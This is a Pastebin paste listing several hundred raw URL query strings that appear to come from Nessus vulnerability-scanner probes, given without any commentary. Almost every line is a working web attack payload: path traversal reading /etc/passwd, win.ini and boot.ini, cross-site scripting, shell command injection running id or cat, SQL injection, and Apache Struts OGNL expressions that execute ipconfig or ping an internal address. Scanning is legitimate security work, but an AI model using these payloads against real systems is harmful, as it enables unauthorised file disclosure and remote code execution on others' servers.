Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username=
- tab=Status
- tab=status
- item=All
- ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm
- 4242+../../../../../../../../../../../../../etc/passwd
- url=file:/etc/passwd
- icatcommand=..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini&catalogname=catalog
- I'm%20Here
- url=main.jsp
- version=1.5
- MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE
- gadget=../../../../../../etc/passwd%00&path=/etc
- action=start&pg=../../../../../../../../../../../etc/passwd
- %3Cscript%3Edocument.cookie=%22testqxzb=7164;%22%3C/script%3E
- %3Cmeta%20http-equiv=Set-Cookie%20content=%22testqxzb=7164%22%3E
- rev=1
- mv_arg=%7Ccat%20/etc/passwd%7C
- arg=/dir/../../../../../../../../../../../windows/win.ini
- arg=/dir/../../../../../../../../../../../winnt/win.ini
- arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
- arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini
- arg=/dir/../../../../../../etc/passwd
- arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
- board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd
- StartID=../../../../../../../../../etc/passwd%00.html
- board=news&action=display&num=../../../../../../etc/passwd%00
- ..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
- ..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini
- command=goto&file=../../../../../../../../../../etc/passwd
- command=view_textfile&file=/etc/passwd&filters=;
- site=../../../../../../../../etc/passwd%00
- action=category_show&id='
- show=/etc/passwd
- wwMaint~EditConfig
- APP=qmh-news&TEMPLATE=;ls%20/etc%7C
- action=default¤t=%7Ccat%20/etc/passwd%7C&form_tid=996604045&prev=main.html&list_message_index=10
- DB=whateverwhatever
- form=../../../../../../etc/passwd%00
- templ=../../../../../etc/passwd
- dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
- -v
- error=webacc
- redirects=10
- action=login
- theme=../../../../../../../etc/passwd%00
- align=topcenter
- owa_do=base.loginForm
- screen=/etc/passwd
- HTNAME=sgdynamo.exe
- month=../../../../../../etc/passwd
- HOSTSVC=../../../../../etc/passwd
- ../../../../../../etc/passwd
- ProfileID=%3Cscript%3Efoo%3C/script%3E
- cmd=serverInfo
- _browser_out=.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2F.%7C.%2Fetc%2Fpasswd
- fuseaction=category.display&category_ID='
- page=../../../../../etc/passwd%00index.html
- /../../../../../../etc/passwd
- mss=%2e%2e/config
- service=git-upload-pack
- script=/../../../../etc/passwd
- DEBUG-SHOW-VERSION
- wt=xml
- t=../../../../../../etc/passwd
- category=nessus
- __mode=logout
- cfg=/../../../../../../../../../etc/passwd
- p0=../../../../../../../../../etc/passwd%00
- cfg=/../../../../../../../../../winnt/win.ini
- script=webplus_install_path.nasl
- data_dir=/etc/passwd%00
- menue=../../../../../../../../../etc/passwd
- dir=/
- etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/
- dir=../../../../../../etc
- user=nessus-1548422553
- page=invalid&type=browser
- data=Download
- ho+%7BCOMPLETE_VERSION%7D
- cat=../../../../../etc/passwd%00
- config=%7Ccat%20/etc/passwd%7C
- cat%20/etc/passwd
- frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00
- %2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf
- sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
- sys:/novonyx/suitespot/docs/sewse/misc/test.jse
- Mode=debug
- thesection=../../../../../../../../etc/passwd%00
- file=../../../../../../../../../../../../etc/passwd%00
- %7Ctype%20c:%5Cwinnt%5Cwin.ini
- submit=ViewFile&month=01&year=2004&file=%7Ccat%20/etc/passwd%7C
- %7Ctype%20c:%5Cwindows%5Cwin.ini
- V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus
- V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus'
- p=nessuscheck
- HTNAME=%3Cscript%3Efoo%3C/script%3E
- group=--
- url=http://www.google.com
- TARGET=http://www.nessus.org
- db=/etc/passwd%00
- -c/nonexistent
- catid=1%20SQL
- map=mapserver_detect.nasl.map
- item=all
- ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
- cmd=test
- page=../../../../../../etc/passwd%00.html
- page=../html/splx_main.htm
- template=../../../../../../../../../../../../../../../etc/passwd
- CiTemplate=../../../../../winnt/win.ini
- CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
- postdata=%22%3E%3Cscript%3Efoo%3C/script%3E
- newpage=../../../../../../etc/passwd
- IdcService=GET_ENVIRONMENT&IsJson=1
- v=../../../../../../../../../../etc/passwd%00
- ver
- Init+0
- /auth/login/
- ../../../../../../../../../etc/passwd
- function=about
- show=http://xxx./nessus
- stichwort=anything
- lang=en&cntry=
- file=../../../../../../../../../../bin/cat%20/etc/passwd%00%7C
- dynamicimage=../../../../../../../../winnt/system.ini
- action=bootstrap
- cmd=show&page=../../../../../../../../../etc/passwd
- Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252
- access-mode=text
- palsAction=restart&documentName=/etc/passwd
- mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
- lang=../../../../../../../../etc/passwd%00
- 0
- %3Cscript%3Ecross_site_scripting.nasl%3C/script%3E
- %3CIMG%20SRC=%22javascript:alert(cross_site_scripting.nasl);%22%3E
- wsdl
- CookieSet=true
- /etc/passwd
- multi=/etc/passwd%00html
- &file=login
- p='nessus
- az=list&forum=../../../../../../../etc/passwd%00
- exclude=%60/etc/passwd%60
- file=%3CSCRIPT%3Ewindow.alert%3C/SCRIPT%3E
- area=robohelpserver_apsb09_14_safe.nasl
- p=../../../../../../../../../../etc/passwd
- next=../../../../../etc/passwd%00
- page=../../../../../../../../../../etc/passwd%00html&cart_id=
- url=http://12345678910
- act=ST&f=1&t=1&hl=nessus&st='
- node=%3Cscript%3Ealert('XSS')%3C/script%3E
- t=c&u=%3Cscript%3Efoo%3C/script%3E
- indexname=%3E%22%3E%3Cscript%3Efoo%3C/script%3E&style=fancy&spage=60&query=Folder%20name
- urlmaskfilter=%3Cscript%3Efoo%3C/script%3E
- User.lang=%3Cscript%3Efoo%3C/script%3E
- want=showcat&show=../../../../../etc/passwd%00
- act=network.Login&rtyp=login
- action=sm
- format=api
- sort=%22].passthru('id').exit().%24a[%22
- sort=%7B%24%7Bpassthru(chr(105).chr(100))%7D%7D%7B%24%7Bexit()%7D%7D
- getv=t
- sort=%22].phpinfo().exit().%24a[%22
- sort=%7B%24%7Bphpinfo()%7D%7D%7B%24%7Bexit()%7D%7D
- plugin=com.dell.oma.webplugins.AboutWebPlugin
- sp.nextform=../../../../../../../../../etc/passwd
- cmd=Config
- entry='
- ReadDesign
- nessus&template=../../../../../../../../../../etc/passwd%00html
- show=../../../../../../../../../../../../../etc/passwd%00
- q=%25%22%3cscript%3ealert(1548422584)%3c/script%3e
- href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B
- config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert('htsearch_sort_xss.nasl')%3c%2fscript%3e&words=htsearch_sort_xss.nasl
- errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert('fusetalk_mult_xss.nasl')%3c%2fscript%3e%3ca%20href%3d%22
- id=%22%3E%3cscript%3ealert('Nessus')%3c%2fscript%3e
- ~urlmime=%22%3e%3cscript%3ealert(%22sap_its_urlmime_xss.nasl%22)%3c%2fscript%3e%3cimg%20src%3d%22
- windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e
- user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E
- Help+00.abcd.e.fghijk%22%22%22%3E%3Cscript%3Ealert(%22%22%22XSS%22%22%22)%3C/script%3E
- autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl'
- URL=CSCOnm/servlet/com.cisco.core.mice.main?command=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
- activatecode=&member=%22%3e%3cscript%3ealert('mvnforum_activatemember_xss.nasl')%3c%2fscript%3e
- url=%22%3E%3Cscript%3Ealert(%22gossamer_links_url_xss.nasl%22)%3B%3C%2Fscript%3E&from=add
- op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e
- cvsroot=%3Cscript%3Efoo%3C/script%3E
- search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f
- action=showmonth&year=%3Cscript%3Efoo%3C/script%3E&month=%3Cscript%3Efoo%3C/script%3E
- Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e
- %22%3E%3Cscript%3Ealert('struts_sa_surl_xss.nasl-1548422586')%3C/script%3E
- tag=tenable-994614006&method%3a%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23writer%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23writer.println(%23parameters.tag[0]),%23writer.flush(),%23writer.close
- Target=Main&Action=../../../../../../../../../..//windows/win.ini
- Target=Main&Action=../../../../../../../../../..//winnt/win.ini
- path=file:///winnt/win.ini%00
- action:%25%7B(new+java.lang.ProcessBuilder(new+java.lang.String[]%7B'ipconfig'%7D)).start()%7D
- path=file:///windows/win.ini%00
- redirect:$%7B%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23resp.print('At%201548422587%20Nessus%20found%20the%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()%7D
- redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ping%20-n%203%20-l%20500%20172.16.10.93%27%29.getInputStream%28%29%29%7d
- id=../../../../../../../../../../../..//boot.ini%00.jpg
- search[instance_eval]=Kernel.fail%20%60ipconfig%20%2fall%60
- cmd=cmd.exe%20%2fc%20ping%20%2dn%203%20%2dl%20500%20172.16.10.93
- %27),%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23a=@java.lang.Runtime@getRuntime(),%23a.exec(%27ping%20%2dn%203%20%2dl%20500%20172.16.10.93%27),new%20java.lang.String(%27
- redirect:%24%7B57550614%2b16044095%7D
- path=file:/winnt/win.ini%00
- path=file:/windows/win.ini%00
- last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f
- lang=/../../../../../../../../../../../../../boot.ini
- name=/eventcache/../../../../../../../../../../../boot.ini
- url=../../../../../../../../../../../../windows/win.ini
- url=../../../../../../../../../../../../winnt/win.ini
- log=info&mode=asc&lines=10
- Language=fr
- path=bin/mozilla&action=list_users
- action=login&filename=frameset.html%7Cid%00%7C
- open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert('plumtree_name_xss.nasl')%3c%2fscript%3e
- LO=../../../../../etc/passwd
- user=%7C%22%60id%60%22%7C
- page=eventLog&machine=&logName=System&account=administrator
- catalogid='42
- User.interface=/../webacc/hdml
- onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e
- sql='adodb_sql_sql_injection.nasl
- distloc=;id
- do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
- file=%7Cid%7C
- NS-query-pat=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini
- NS-query-pat=../../../../../../../../../etc/passwd
- class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1548422602
- section=0&topic=ls%3bid
- user=cpanel&template=%7C/usr/bin/id%7C
- user=cpanel&template=%7C/bin/id%7C
- cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=%7Cid%7C
- query=localhost%3bid&type=ANY&ns=
- preftemp=temp&page=anonymous&file=%7Cid%7C
- from=nessus%22%7Cid%22
- p=%7Cid%7C
- template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl
- keys=*&prc=any&catigory=../../../../../../../../../../../../etc
- show=%2Fetc%2Fpasswd
- login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem(id)&action=logout
- ideaDir=http://xxxxxxxx
- daysonly=0).system(id).(
- daysonly=0).system('id').(
- in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and
- errPagePath=/etc/passwd
- %22%3E%3Cscript%3Ealert(%22ibm_login_qs_xss.nasl-1548422607%22)%3C/script%3E
- action=showartikel&cat=nessus&catname=nessus&art=%7Cid%7C
- func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;
- template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl
- ins=nowait&sel=localhost&act=ping
- host=%60id%60&port=6105&errchk=0&idsbypass=0
- file=/etc/master.passwd
- job=showoldmail&mail=%7Cid%7C
- -dump
- helpdir=../../setup/locale/resources&token=Frame-Title-Text&mapfile=DSSetupResources.properties&debug=1
- errorno=3
- QALIAS=x%0a/bin/cat%20/etc/passwd
- action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
- ImageName=cart32.ini%00.gif
- template=includer_rcmdexec.nasl
- User.interface=/../webacc/hdml&User.id=%22%3E%3Cimg/src=%221548422608%22/onerror=javascript:alert(/groupwise_webaccess_userinterface_xss.nasl/%22)%3E
- path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
- ALTERNATE_TEMPLATES=%7C%20echo%20%22Content-Type:%20text%2Fhtml%22%3Becho%20%22%22%20%3B%20id%00
- sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
- mode=admin
- SSL=&Server=xxx.xxx.xxx.xxx&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--%7B%7BOtherCommunity%7D%7D,,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1
- username=&command=simple&do=edit&password=&file=%7Cid%7C
- %5Cdvips%5Cdpi%7B150%7Cid%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1548422609%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1548422609%20%7D
- page=User&editor=../../../Install
- CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id%7C&CODE=PHOLD
- debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)
- nChannel='1
- month='%20UNION%20SELECT%201%2c1%2c'1548422609'%2c'calendarix_month_sql_injection.nasl'%2c1%20%23
- ('%5Cu0023_memberAccess[%5C'allowStaticMethodAccess%5C']')(meh)=true&(aaa)(('%5Cu0023context[%5C'xwork.MethodAccessor.denyMethodExecution%5C']%5Cu003d%5Cu0023foo')(%5Cu0023foo%5Cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5Cu0023thread.sleep(5000)')(%5Cu0023thread%5Cu003d@java.lang.Thread@currentThread()))=1
- fqdn=%0Aid
- F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini
- %7Cid%7C
- F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini
- command=savesetup&setup=print%20%60id%60
- URL=http://www.example.com/%0d%0aX-ciscoworks_response_splitting-nasl:%201548422609
- -V
- -P%20id%20ls
- program=-P%20id%20ls
- productid='42
- q=http://www.nessus.org/
- section=-P%20id&topic=w
- xml-stylesheet=none
- CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1
- toc=/etc/passwd%00
- netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20%7C%20id%7C
- action=load&whois=%3Bid
- redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl
- Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl
- cmd=getdoc&db=man&fname=%7C/bin/id
- sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=3AGXMnfnDvxowLQi3
- sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=pqgMJ9GtzcY46kUNA
- sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=iZPDzVAWWfPNNFgj6
- page=c:%5C%5Cwinnt%5C%5Cwin.ini
- page=../../../../../etc/passwd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement